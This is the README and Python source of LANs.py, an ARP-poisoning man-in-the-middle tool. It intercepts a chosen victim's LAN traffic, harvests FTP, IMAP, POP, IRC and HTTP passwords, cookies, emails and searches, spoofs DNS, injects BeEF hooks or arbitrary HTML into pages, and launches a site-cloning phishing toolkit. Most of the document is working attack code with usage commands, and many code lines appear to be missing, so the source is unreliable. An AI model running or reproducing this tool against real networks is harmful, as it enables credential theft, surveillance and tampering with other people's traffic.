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LANs.py ARP Spoofer – Multithreaded Asynchronous Packet Parsing/Injecting

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Multithreaded asynchronous packet parsing/injecting ARP poisoner.

Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.

Prereqs: Linux, scapy, python nfqueue-bindings 0.4.3+, aircrack-ng, python twisted, BeEF (optional), and a wireless card capable of promiscuous mode if you choose not to use the -ip option

Tested on Kali 1.0. In the following examples will be the attacking machine and will be the victim.

All options:

python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d]
[-v] [-dns DNSSPOOF] [-r IPADDRESS] [-set] [-p] [-na] [-n] [-i INTERFACE]
[-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP]


Simplest usage (including active user targeting):

python LANs.py

Because there's no -ip option this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending. so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing.

Passive harvesting:

python LANs.py -u -d -p -ip

-u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting

-d: open an xterm with driftnet to see all images they view

-p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received; will also decode base64 if the email authentication is encrypted with it

-ip: target this IP address

Easy to remember and will probably be the most common usage of the script: options u, d, p, like udp/tcp.

HTML injection:

python LANs.py -b

Inject a BeEF hook URL (BeEF - The Browser Exploitation Framework Project, tutorial: The Browser Exploitation Framework (BeEF) – Part 1 - InfoSec Institute) into pages the victim visits.

python LANs.py -c '<title>Owned.</title>'

Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> and failing that injects prior to the first </head>. This example will change the page title to 'Owned.'

Read from pcap:

python LANs.py -pcap libpcapfilename -ip

To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.

Most aggressive usage:

python LANs.py -v -d -p -n -na -set -dns facebook.com -r -c '<title>Owned.</title>' -b -ip

#!/usr/bin/env python2


Description: ARP poisons a LAN victim and prints all the interesting unencrypted info like usernames, passwords and messages. Asynchronous multithreaded arp spoofing packet parser.

Prerequisites: Linux

nmap (optional)

nbtscan (optional)


Python 2.6+

nfqueue-bindings 0.4-3



Note: This script flushes iptables before and after usage.

To do: Add karma MITM technique

Add SSL proxy for self-signed cert, and make the script force a single JS popup saying there's a temporary problem with SSL validation and to just click through

Add anticaching (just edit the headers)

Ability to add option which will add a delay, allowing user to modify HTML/email/irc/usernames and passwords on the fly (how much interest is there in this?)


__author__ = 'Dan McInerney'

__license__ = 'BSD'

__contact__ = 'danhmcinerney with gmail'

__version__ = 1.0


import nfqueue

except Exception:

nfq = raw_input('[-] python-nfqueue not installed, would you like to install now? (apt-get install -y python-nfqueue will be run if yes) [y/n]: ')

if nfq == 'y':

os.system('apt-get install -y python-nfqueue')


exit('[-] Exiting due to missing dependency')

import logging


from scapy.all import *


#Below is necessary to receive a response to the DHCP packets because we're sending to but receiving from the IP of the DHCP server


from sys import exit

from threading import Thread

import argparse

from os import geteuid, devnull

import signal

from base64 import b64decode

from subprocess import *

from twisted.internet import reactor

from twisted.internet.interfaces import IReadDescriptor

from twisted.internet.protocol import Protocol, Factory

from zlib import decompressobj, decompress

import gzip

from cStringIO import StringIO

import requests

def parse_args():

#Create the arguments

parser = argparse.ArgumentParser()

parser.add_argument("-b", "--beef", help="Inject a BeEF hook URL. Example usage: -b")

parser.add_argument("-c", "--code", help="Inject arbitrary html. Example usage (include quotes): -c '<title>New title</title>'")

parser.add_argument("-u", "--urlspy", help="Show all URLs and search terms the victim visits or enters minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -v to print all URLs and without truncation.", action="store_true")

parser.add_argument("-ip", "--ipaddress", help="Enter IP address of victim and skip the arp ping at the beginning which would give you a list of possible targets. Usage: -ip <victim IP>")

parser.add_argument("-vmac", "--victimmac", help="Set the victim MAC; by default the script will attempt a few different ways of getting this so this option hopefully won't be necessary")

parser.add_argument("-d", "--driftnet", help="Open an xterm window with driftnet.", action="store_true")

parser.add_argument("-v", "--verboseURL", help="Shows all URLs the victim visits but doesn't limit the URL to 150 characters like -u does.", action="store_true")

parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument. An argument like [facebook.com] will match all subdomains of facebook.com")

parser.add_argument("-set", "--setoolkit", help="Start Social Engineer's Toolkit in another window.", action="store_true")

parser.add_argument("-p", "--post", help="Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP usernames/passwords and incoming/outgoing emails. Will also decode base64 encrypted POP/IMAP username/password combos for you.", action="store_true")

parser.add_argument("-na", "--nmapaggressive", help="Aggressively scan the target for open ports and services in the background. Output to ip.add.re.ss.log.txt where ip.add.re.ss is the victim's IP.", action="store_true")

parser.add_argument("-n", "--nmap", help="Scan the target for open ports prior to starting to sniffing their packets.", action="store_true")

parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`.")

parser.add_argument("-r", "--redirectto", help="Must be used with -dns DOMAIN option. Redirects the victim to the IP in this argument when they visit the domain in the -dns DOMAIN option")

parser.add_argument("-rip", "--routerip", help="Set the router IP; by default the script with attempt a few different ways of getting this so this option hopefully won't be necessary")

parser.add_argument("-rmac", "--routermac", help="Set the router MAC; by default the script with attempt a few different ways of getting this so this option hopefully won't be necessary")

parser.add_argument("-pcap", "--pcap", help="Parse through a pcap file")

return parser.parse_args()

#Console colors

W = '\033[0m' # white (normal)

R = '\033[31m' # red

G = '\033[32m' # green

O = '\033[33m' # orange

B = '\033[34m' # blue

P = '\033[35m' # purple

C = '\033[36m' # cyan

GR = '\033[37m' # gray

T = '\033[93m' # tan

logger = open('LANspy.log.txt', 'w+')

DN = open(devnull, 'w')

class Spoof():

def originalMAC(self, ip):

# srp is for layer 2 packets with Ether layer, sr is for layer 3 packets like ARP and IP

ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=5, retry=3)

for s,r in ans:

return r.sprintf("%Ether.src%")

def poison(self, routerIP, victimIP, routerMAC, victimMAC):

send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC))

send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))

def restore(self, routerIP, victimIP, routerMAC, victimMAC):

send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)

send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)

class Parser():

# Mail, irc, post parsing

OheadersFound = []

IheadersFound = []

IMAPauth = 0

IMAPdest = ''

POPauth = 0

POPdest = ''

Cookies = []

IRCnick = ''

mail_passwds = []

oldmailack = ''

oldmailload = ''

mailfragged = 0

# http parsing

oldHTTPack = ''

oldHTTPload = ''

HTTPfragged = 0

# html injection

block_acks = []

html_url = ''

user_agent = None

def __init__(self, args):

self.args = args

def start(self, payload):

if self.args.pcap:

if self.args.ipaddress:


pkt = payload[iP]

except Exception:




pkt = IP(payload.get_data())

except Exception:


IP_layer = pkt[iP]

IP_dst = pkt[iP].dst

IP_src = pkt[iP].src

if self.args.urlspy or self.args.post or self.args.beef or self.args.code:

if pkt.haslayer(Raw):

if pkt.haslayer(TCP):

dport = pkt[TCP].dport

sport = pkt[TCP].sport

ack = pkt[TCP].ack

seq = pkt[TCP].seq

load = pkt[Raw].load

mail_ports = [25, 26, 110, 143]

if dport in mail_ports or sport in mail_ports:

self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack)

if dport == 6667 or sport == 6667:

self.irc(load, dport, sport, IP_src)

if dport == 21 or sport == 21:

self.ftp(load, IP_dst, IP_src)

if dport == 80 or sport == 80:

self.http_parser(load, ack, dport)

if self.args.beef or self.args.code:

self.injecthtml(load, ack, pkt, payload, dport, sport)

if self.args.dnsspoof:

if pkt.haslayer(DNSQR):

dport = pkt[uDP].dport

sport = pkt[uDP].sport

if dport == 53 or sport == 53:

dns_layer = pkt[DNS]

self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, payload)

def get_user_agent(self, header_lines):

for h in header_lines:

user_agentre = re.search('[uu]ser-[Aa]gent: ', h)

if user_agentre:

return h.split(user_agentre.group(), 1)[1]

def injecthtml(self, load, ack, pkt, payload, dport, sport):

for x in self.block_acks:

if ack == x:



ack = str(ack)

if self.args.beef:

bhtml = '<script src='+self.args.beef+'></script>'

if self.args.code:

chtml = self.args.code


headers, body = load.split("\r\n\r\n", 1)

except Exception:

headers = load

body = ''

header_lines = headers.split("\r\n")

if dport == 80:

post = None

get = self.get_get(header_lines)

host = self.get_host(header_lines)

self.html_url = self.get_url(host, get, post)

if self.html_url:

d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']

if any(i in self.html_url for i in d):

self.html_url = None






self.user_agent = "'"+self.get_user_agent(header_lines)+"'"

if not self.user_agent:

# Most common user-agent on the internet

self.user_agent = "'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36'"



if sport == 80 and self.html_url and 'Content-Type: text/html' in headers:

# This can be done better, probably using filter()

header_lines = [x for x in header_lines if 'transfer-encoding' not in x.lower()]

for h in header_lines:

if '1.1 302' in h or '1.1 301' in h: # Allow redirects to go thru unperturbed


self.html_url = None


UA_header = {'User-Agent':self.user_agent}

r = requests.get('http://'+self.html_url, headers=UA_header)


body = r.text.encode('utf-8')

except Exception:


debugger = open('/home/user/projects/origBody', 'w')




if self.args.beef:

if '<html' in body or '/html>' in body:


psplit = body.split('</head>', 1)

body = psplit[0]+bhtml+'</head>'+psplit[1]

except Exception:


psplit = body.split('<head>', 1)

body = psplit[0]+'<head>'+bhtml+psplit[1]

except Exception:

if not self.args.code:

self.html_url = None





if self.args.code:

if '<html' in body or '/html>' in body:


psplit = body.split('<head>', 1)

body = psplit[0]+'<head>'+chtml+psplit[1]

except Exception:


psplit = body.split('</head>', 1)

body = psplit[0]+chtml+'</head>'+psplit[1]

except Exception:

self.html_url = None



# Recompress data if necessary

if 'Content-Encoding: gzip' in headers:

if body != '':

# debugger = open('/home/user/projects/injectedBody', 'w')

# debugger.write(body)

# debugger.close()


comp_body = StringIO()

f = gzip.GzipFile(fileobj=comp_body, mode='w', compresslevel = 9)



body = comp_body.getvalue()

except Exception:


pkt[Raw].load = headers+"\r\n\r\n"+body

pkt[iP].len = len(str(pkt))

del pkt[iP].chksum

del pkt[TCP].chksum



print '[-] Could not recompress html, sent packet as is'

self.html_url = None


except Exception:

self.html_url = None



headers = "\r\n".join(header_lines)

pkt[Raw].load = headers+"\r\n\r\n"+body

pkt[iP].len = len(str(pkt))

del pkt[iP].chksum

del pkt[TCP].chksum



print R+'[!] Injected HTML into packet for '+W+self.html_url

logger.write('[!] Injected HTML into packet for '+self.html_url)



self.html_url = None

except Exception:


self.html_url = None

print '[-] Failed to inject packet'


if len(self.block_acks) > 30:

self.block_acks = self.block_acks[5:]

def get_host(self, header_lines):

for l in header_lines:

searchHost = re.search('[Hh]ost: ', l)

if searchHost:


return l.split('Host: ', 1)[1]

except Exception:


return l.split('host: ', 1)[1]

except Exception:


def get_get(self, header_lines):

for l in header_lines:

searchGet = re.search('GET /', l)

if searchGet:


return l.split('GET ')[1].split(' ')[0]

except Exception:


def get_post(self, header_lines):

for l in header_lines:

searchPost = re.search('POST /', l)

if searchPost:


return l.split(' ')[1].split(' ')[0]

except Exception:


def get_url(self, host, get, post):

if host:

if post:

return host+post

if get:

return host+get

# Catch search terms

# As it stands now this has a moderately high false positive rate mostly due to the common ?s= and ?q= vars

# I figured better to err on the site of more data than less and it's easy to tell the false positives from the real searches

def searches(self, url, host):

# search, query, search?q, ?s, &q, ?q, search?p, searchTerm, keywords, command

searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|search[Tt]erm|keywords|command)=([^&][^&]*))', url)

if searched:

searched = searched.group(3)

# Common false positives

if 'select%20*%20from' in searched:


if host == 'geo.yahoo.com':



searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'').replace('%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22', '\"').replace('%24', '$')

print T+'[+] Searched '+W+host+T+': '+searched+W

logger.write('[+] Searched '+host+ ' for: '+searched+'\n')

def post_parser(self, url, body, host, header_lines):

if 'ocsp' in url:

print B+'[+] POST: '+W+url

logger.write('[+] POST: '+url+'\n')

elif body != '':


urlsplit = url.split('/')

url = urlsplit[0]+'/'+urlsplit[1]

except Exception:


if self.HTTPfragged == 1:

print B+'[+] Fragmented POST: '+W+url+B+" HTTP POST's combined load: "+body+W

logger.write('[+] Fragmented POST: '+url+" HTTP POST's combined load: "+body+'\n')


print B+'[+] POST: '+W+url+B+' HTTP POST load: '+body+W

logger.write('[+] POST: '+url+" HTTP POST's combined load: "+body+'\n')

# If you see any other login/pw variable names, tell me and I'll add em in here

# As it stands now this has a moderately high false positive rate; I figured better to err on the site of more data than less

# email, user, username, name, login, log, loginID

user_regex = '([Ee]mail|[uu]ser|[uu]sername|[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[ii][Dd])=([^&|;]*)'

# password, pass, passwd, pwd, psw, passwrd, passw

pw_regex = '([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp][ss][Ww]|[Pp]asswrd|[Pp]assw)=([^&|;]*)'

username = re.findall(user_regex, body)

password = re.findall(pw_regex, body)

self.user_pass(username, password)

self.cookies(host, header_lines)

def http_parser(self, load, ack, dport):

load = repr(load)[1:-1]

# Catch fragmented HTTP posts

if dport == 80 and load != '':

if ack == self.oldHTTPack:

self.oldHTTPload = self.oldHTTPload+load

load = self.oldHTTPload

self.HTTPfragged = 1


self.oldHTTPload = load

self.oldHTTPack = ack

self.HTTPfragged = 0


headers, body = load.split(r"\r\n\r\n", 1)

except Exception:

headers = load

body = ''

header_lines = headers.split(r"\r\n")

host = self.get_host(header_lines)

get = self.get_get(header_lines)

post = self.get_post(header_lines)

url = self.get_url(host, get, post)

# print urls

if url:

#Print the URL

if self.args.verboseURL:

print '[*] '+url

logger.write('[*] '+url+'\n')

if self.args.urlspy:

d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']

if any(i in url for i in d):


if len(url) > 146:

print '[*] '+url[:145]

logger.write('[*] '+url[:145]+'\n')


print '[*] '+url

logger.write('[*] '+url+'\n')

# Print search terms

self.searches(url, host)

#Print POST load and find cookies

if self.args.post and post:

self.post_parser(url, body, host, header_lines)

def ftp(self, load, IP_dst, IP_src):

load = repr(load)[1:-1].replace(r"\r\n", "")

if 'USER ' in load:

print R+'[!] FTP '+load+' SERVER: '+IP_dst+W

logger.write('[!] FTP '+load+' SERVER: '+IP_dst+'\n')

if 'PASS ' in load:

print R+'[!] FTP '+load+' SERVER: '+IP_dst+W

logger.write('[!] FTP '+load+' SERVER: '+IP_dst+'\n')

if 'authentication failed' in load:

print R+'[*] FTP '+load+W

logger.write('[*] FTP '+load+'\n')

def irc(self, load, dport, sport, IP_src):

load = repr(load)[1:-1].split(r"\r\n")

if self.args.post:

if IP_src == victimIP:

if 'NICK ' in load[0]:

self.IRCnick = load[0].split('NICK ')[1]

server = load[1].replace('USER user user ', '').replace(' :user', '')

print R+'[!] IRC username: '+self.IRCnick+' on '+server+W

logger.write('[!] IRC username: '+self.IRCnick+' on '+server+'\n')

if 'NS IDENTIFY ' in load[0]:

ircpass = load[0].split('NS IDENTIFY ')[1]

print R+'[!] IRC password: '+ircpass+W

logger.write('[!] IRC password: '+ircpass+'\n')

if 'JOIN ' in load[0]:

join = load[0].split('JOIN ')[1]

print C+'[+] IRC joined: '+W+join

logger.write('[+] IRC joined: '+join+'\n')

if 'PART ' in load[0]:

part = load[0].split('PART ')[1]

print C+'[+] IRC left: '+W+part

logger.write('[+] IRC left: '+part+'\n')

if 'QUIT ' in load[0]:

quit = load[0].split('QUIT :')[1]

print C+'[+] IRC quit: '+W+quit

logger.write('[+] IRC quit: '+quit+'\n')

# Catch messages from the victim to an IRC channel

if 'PRIVMSG ' in load[0]:

if IP_src == victimIP:

load = load[0].split('PRIVMSG ')[1]

channel = load.split(' :', 1)[0]

ircmsg = load.split(' :', 1)[1]

if self.IRCnick != '':

print C+'[+] IRC victim '+W+self.IRCnick+C+' to '+W+channel+C+': '+ircmsg+W

logger.write('[+] IRC '+self.IRCnick+' to '+channel+': '+ircmsg+'\n')


print C+'[+] IRC msg to '+W+channel+C+': '+ircmsg+W

logger.write('[+] IRC msg to '+channel+':'+ircmsg+'\n')

# Catch messages from others that tag the victim's nick

elif self.IRCnick in load[0] and self.IRCnick != '':

sender_nick = load[0].split(':', 1)[1].split('!', 1)[0]


load = load[0].split('PRIVMSG ')[1].split(' :', 1)

channel = load[0]

ircmsg = load[1]

print C+'[+] IRC '+W+sender_nick+C+' to '+W+channel+C+': '+ircmsg[1:]+W

logger.write('[+] IRC '+sender_nick+' to '+channel+': '+ircmsg[1:]+'\n')

except Exception:


def cookies(self, host, header_lines):

for x in header_lines:

if 'Cookie:' in x:

if x in self.Cookies:


elif 'safebrowsing.clients.google.com' in host:




print P+'[+] Cookie found for '+W+host+P+' logged in LANspy.log.txt'+W

logger.write('[+] Cookie found for'+host+':'+x.replace('Cookie: ', '')+'\n')

def user_pass(self, username, password):

if username:

for u in username:

print R+'[!] Username found: '+u[1]+W

logger.write('[!] Username: '+u[1]+'\n')

if password:

for p in password:

if p[1] != '':

print R+'[!] Password: '+p[1]+W

logger.write('[!] Password: '+p[1]+'\n')

def mailspy(self, load, dport, sport, IP_dst, IP_src, mail_ports, ack):

load = repr(load)[1:-1]

# Catch fragmented mail packets

if ack == self.oldmailack:

if load != r'.\r\n':

self.oldmailload = self.oldmailload+load

load = self.oldmailload

self.mailfragged = 1


self.oldmailload = load

self.oldmailack = ack

self.mailfragged = 0


headers, body = load.split(r"\r\n\r\n", 1)

except Exception:

headers = load

body = ''

header_lines = headers.split(r"\r\n")

email_headers = ['Date: ', 'Subject: ', 'To: ', 'From: ']

# Find passwords

if dport in [25, 26, 110, 143]:

self.passwords(IP_src, load, dport, IP_dst)

# Find outgoing messages

if dport == 26 or dport == 25:

self.outgoing(load, body, header_lines, email_headers, IP_src)

# Find incoming messages

if sport in [110, 143]:

self.incoming(headers, body, header_lines, email_headers, sport, dport)

def passwords(self, IP_src, load, dport, IP_dst):

load = load.replace(r'\r\n', '')

if dport == 143 and IP_src == victimIP and len(load) > 15:

if self.IMAPauth == 1 and self.IMAPdest == IP_dst:

# Don't double output mail passwords

for x in self.mail_passwds:

if load in x:

self.IMAPauth = 0

self.IMAPdest = ''


print R+'[!] IMAP user and pass found: '+load+W

logger.write('[!] IMAP user and pass found: '+load+'\n')


self.decode(load, dport)

self.IMAPauth = 0

self.IMAPdest = ''

if "authenticate plain" in load:

self.IMAPauth = 1

self.IMAPdest = IP_dst

if dport == 110 and IP_src == victimIP:

if self.POPauth == 1 and self.POPdest == IP_dst and len(load) > 10:

# Don't double output mail passwords

for x in self.mail_passwds:

if load in x:

self.POPauth = 0

self.POPdest = ''


print R+'[!] POP user and pass found: '+load+W

logger.write('[!] POP user and pass found: '+load+'\n')


self.decode(load, dport)

self.POPauth = 0

self.POPdest = ''

if 'AUTH PLAIN' in load:

self.POPauth = 1

self.POPdest = IP_dst

if dport == 26:

if 'AUTH PLAIN ' in load:

# Don't double output mail passwords

for x in self.mail_passwds:

if load in x:

self.POPauth = 0

self.POPdest = ''


print R+'[!] Mail authentication found: '+load+W

logger.write('[!] Mail authentication found: '+load+'\n')


self.decode(load, dport)

def outgoing(self, headers, body, header_lines, email_headers, IP_src):

if 'Message-ID' in headers:

for l in header_lines:

for x in email_headers:

if x in l:


# if date, from, to, in headers then print the message

if len(self.OheadersFound) > 3 and body != '':

if self.mailfragged == 1:

print O+'[!] OUTGOING MESSAGE (fragmented)'+W

logger.write('[!] OUTGOING MESSAGE (fragmented)\n')

for x in self.OheadersFound:

print O+' ',x+W

logger.write(' '+x+'\n')

print O+' Message:',body+W

logger.write(' Message:'+body+'\n')



logger.write('[!] OUTGOING MESSAGE\n')

for x in self.OheadersFound:

print O+' ',x+W

logger.write(' '+x+'\n')

print O+' Message:',body+W

logger.write(' Message:'+body+'\n')

self.OheadersFound = []

def incoming(self, headers, body, header_lines, email_headers, sport, dport):

message = ''

for l in header_lines:

for x in email_headers:

if x in l:


if len(self.IheadersFound) > 3 and body != '':

if "BODY[TEXT]" not in body:


beginning = body.split(r"\r\n", 1)[0]

body1 = body.split(r"\r\n\r\n", 1)[1]

message = body1.split(beginning)[0][:-8] #get rid of last \r\n\r\n

except Exception:


if message != '':

if self.mailfragged == 1:

print O+'[!] INCOMING MESSAGE (fragmented)'+W

logger.write('[!] INCOMING MESSAGE (fragmented)\n')

for x in self.IheadersFound:

print O+' '+x+W

logger.write(' '+x+'\n')

print O+' Message: '+message+W

logger.write(' Message: '+message+'\n')



logger.write('[!] INCOMING MESSAGE\n')

for x in self.IheadersFound:

print O+' '+x+W

logger.write(' '+x+'\n')

print O+' Message: '+message+W

logger.write(' Message: '+message+'\n')

self.IheadersFound = []

def decode(self, load, dport):

decoded = ''

if dport == 25 or dport == 26:


b64str = load.replace("AUTH PLAIN ", "").replace(r"\r\n", "")

decoded = repr(b64decode(b64str))[1:-1].replace(r'\x00', ' ')

except Exception:




b64str = load

decoded = repr(b64decode(b64str))[1:-1].replace(r'\x00', ' ')

except Exception:


# Test to see if decode worked

if '@' in decoded:

print R+'[!] Decoded:'+decoded+W

logger.write('[!] Decoded:'+decoded+'\n')

# Spoof DNS for a specific domain to point to your machine

# Make this more reliable by blocking all DNS responses from the server using the IP_src maybe a self.dnsSrc var

def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, payload):

if self.args.dnsspoof:

if self.args.dnsspoof in dns_layer.qd.qname and not self.args.redirectto:

localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != ''][0]

self.dnsspoof_actions(dns_layer, IP_src, IP_dst, sport, dport, payload, localIP)

elif self.args.dnsspoof in dns_layer.qd.qname and self.args.redirectto:

self.dnsspoof_actions(dns_layer, IP_src, IP_dst, sport, dport, payload, self.args.redirectto)

def dnsspoof_actions(self, dns_layer, IP_src, IP_dst, sport, dport, payload, rIP):


print G+'[+] DNS request for '+W+self.args.dnsspoof+G+' found; dropping packet and injecting spoofed one redirecting to '+W+rIP

logger.write('[+] DNS request for '+self.args.dnsspoof+' found; dropping packet and injecting spoofed one redirecting to '+rIP+'\n')

p = IP(dst=IP_src, src=IP_dst)/UDP(dport=sport, sport=dport)/DNS(id=dns_layer.id, qr=1, aa=1, qd=dns_layer.qd, an=DNSRR(rrname=dns_layer.qd.qname, ttl=10, rdata=rIP))


print G+'[!] Sent spoofed packet for '+W+self.args.dnsspoof+G+' to '+W+rIP

logger.write('[!] Sent spoofed packet for '+self.args.dnsspoof+' to '+rIP+'\n')

#Wrap the nfqueue object in an IReadDescriptor and run the process_pending function in a .doRead() of the twisted IReadDescriptor

class Queued(object):

def __init__(self, args):

self.q = nfqueue.queue()


self.q.fast_open(0, socket.AF_INET)




print '[*] Flushed firewall and forwarded traffic to the queue; waiting for data'

def fileno(self):

return self.q.get_fd()

def doRead(self):


def connectionLost(self, reason):


def logPrefix(self):

return 'queued'

class active_users():

IPandMAC = []

start_time = time.time()

current_time = 0

monmode = ''

def pkt_cb(self, pkt):

if pkt.haslayer(Dot11):

pkt = pkt[Dot11]

if pkt.type == 2:

addresses = [pkt.addr1.upper(), pkt.addr2.upper(), pkt.addr3.upper()]

for x in addresses:

for y in self.IPandMAC:

if x in y[1]:

y[2] = y[2]+1

self.current_time = time.time()

if self.current_time > self.start_time+1:

self.IPandMAC.sort(key=lambda x: float(x[2]), reverse=True) # sort by data packets


print '[*] '+T+'IP address'+W+' and '+R+'data packets'+W+' sent/received'

print '---------------------------------------------'

for x in self.IPandMAC:

if len(x) == 3:

ip = x[0].ljust(16)

data = str(x[2]).ljust(5)

print T+ip+W, R+data+W


ip = x[0].ljust(16)

data = str(x[2]).ljust(5)

print T+ip+W, R+data+W, x[3]

print '\n[*] Hit Ctrl-C at any time to stop and choose a victim IP'

self.start_time = time.time()

def users(self, IPprefix, routerIP):

print '[*] Running ARP ping to identify users on the network; this may take a minute...'

iplist = []

maclist = []


nmap = Popen(['/usr/bin/nmap', '-sn', '-n', IPprefix], stdout=PIPE, stderr=DN)

nmap = nmap.communicate()[0]

nmap = nmap.splitlines()[2:-1]

except Exception:

print '[-] Nmap ARP ping failed, is nmap installed?'

for x in nmap:

if 'Nmap' in x:

pieces = x.split()

nmapip = pieces[len(pieces)-1]

nmapip = nmapip.replace('(','').replace(')','')


if 'MAC' in x:

nmapmac = x.split()[2]


zipped = zip(iplist, maclist)

self.IPandMAC = [list(item) for item in zipped]

# Make sure router is caught in the arp ping

r = 0

for i in self.IPandMAC:


if r == 0:

if routerIP == i[0]:


routerMAC = i[1]

r = 1

if r == 0:

exit('[-] Router MAC not found. Exiting.')

# Do nbtscan for windows netbios names

print '[*] Running nbtscan to get Windows netbios names'


nbt = Popen(['nbtscan', IPprefix], stdout=PIPE, stderr=DN)

nbt = nbt.communicate()[0]

nbt = nbt.splitlines()

nbt = nbt[4:]

except Exception:

print '[-] nbtscan error, are you sure it is installed?'

for l in nbt:


l = l.split()

nbtip = l[0]

nbtname = l[1]

except Exception:

print '[-] Could not find any netbios names. Continuing without them'

if nbtip and nbtname:

for a in self.IPandMAC:

if nbtip == a[0]:


# Start monitor mode

print '[*] Enabling monitor mode [/usr/sbin/airmon-ng ' + 'start ' + interface + ']'


promiscSearch = Popen(['/usr/sbin/airmon-ng', 'start', '%s' % interface], stdout=PIPE, stderr=DN)

promisc = promiscSearch.communicate()[0]

monmodeSearch = re.search('monitor mode enabled on (.+)\)', promisc)

self.monmode = monmodeSearch.group(1)

except Exception:

exit('[-] Enabling monitor mode failed, do you have aircrack-ng installed?')

sniff(iface=self.monmode, prn=self.pkt_cb, store=0)

#Print all the variables

def print_vars(DHCPsrvr, dnsIP, local_domain, routerIP, victimIP):

print "[*] Active interface: " + interface

print "[*] DHCP server: " + DHCPsrvr

print "[*] DNS server: " + dnsIP

print "[*] Local domain: " + local_domain

print "[*] Router IP: " + routerIP

print "[*] Victim IP: " + victimIP

logger.write("[*] Router IP: " + routerIP+'\n')

logger.write("[*] victim IP: " + victimIP+'\n')

#Enable IP forwarding and flush possibly conflicting iptables rules

def setup(victimMAC):

open('/proc/sys/net/ipv4/ip_forward', 'w').write('1\n')

print '[*] Enabled IP forwarding'

os.system('/sbin/iptables -F')

os.system('/sbin/iptables -X')

os.system('/sbin/iptables -t nat -F')

os.system('/sbin/iptables -t nat -X')

# Just throw packets that are from and to the victim into the reactor

os.system('/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)

os.system('/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)

os.system('/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)

os.system('/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)

# To catch DNS packets you gotta do prerouting rather than forward for some reason?

os.system('/sbin/iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')

# Start threads

def threads(args):

rt = Thread(target=reactor.run, args=(False,)) #reactor must be started without signal handling since it's not in the main thread

rt.daemon = True


if args.driftnet:

dr = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/driftnet -i '+interface+' >/dev/null 2>&1',))

dr.daemon = True


if args.dnsspoof and not args.setoolkit:

setoolkit = raw_input('[*] You are DNS spoofing '+args.dnsspoof+', would you like to start the Social Engineer\'s Toolkit for easy exploitation? [y/n]: ')

if setoolkit == 'y':

print '[*] Starting SEtoolkit. To clone '+args.dnsspoof+' hit options 1, 2, 3, 2, then enter '+args.dnsspoof


se = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/setoolkit >/dev/null 2>&1',))

se.daemon = True


except Exception:

print '[-] Could not open SEToolkit, is it installed? Continuing as normal without it.'

if args.nmapaggressive:

print '[*] Starting '+R+'aggressive scan [nmap -e '+interface+' -T4 -A -v -Pn -oN '+victimIP+']'+W+' in background; results will be in a file '+victimIP+'.nmap.txt'


n = Thread(target=os.system, args=('nmap -e '+interface+' -T4 -A -v -Pn -oN '+victimIP+'.nmap.txt '+victimIP+' >/dev/null 2>&1',))

n.daemon = True


except Exception:

print '[-] Aggressive Nmap scan failed, is nmap installed?'

if args.setoolkit:

print '[*] Starting SEtoolkit'


se = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/setoolkit >/dev/null 2>&1',))

se.daemon = True


except Exception:

print '[-] Could not open SEToolkit, continuing without it.'

def pcap_handler(args):

global victimIP

bad_args = [args.dnsspoof, args.beef, args.code, args.nmap, args.nmapaggressive, args.driftnet, args.interface]

for x in bad_args:

if x:

